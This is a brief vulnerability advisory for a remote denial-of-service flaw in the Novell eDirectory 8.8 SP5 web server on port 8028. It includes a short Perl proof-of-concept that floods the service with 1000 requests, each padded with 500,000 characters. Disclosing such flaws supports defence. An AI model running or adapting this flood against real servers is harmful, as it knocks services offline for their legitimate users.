The Novell eDirectory webserver version 8.8 SP5 suffers from a remote denial of service vulnerability.
d8ce579323548487ac6bfd7018536239a987d2864696bd33faeeca20cc352bb7
Affected Software:
Novell eDirectory 8.8 SP5
Vulnerability Description:
Novell eDirectory 8.8 SP5 is vulnerable to a denial of service attack.
If a remote attacker sends Unicode strings with Http Request to "8028 port"
("8028" is the default port of Novell eDirectory Dhost Http Server),
the attacker can cause the system to consume 100% of the CPU resources.
Credits to:
Hellcode Research
Original Advisory:
http://tcc.hellcode.net/advisories/hellcode-adv003.txt
Exploit:
- snip-
....
$data = "?" x 500000;
for($i= 0; $i < 1000; $i++)
{
$sock= new IO::Socket::INET( PeerAddr => "localhost",
PeerPort => 8028,
Proto => 'tcp',
Type => SOCK_STREAM,
);
print $sock "GET /$data HTTP/1.0\r\n\r\n";
close($sock);
}
...
- snip -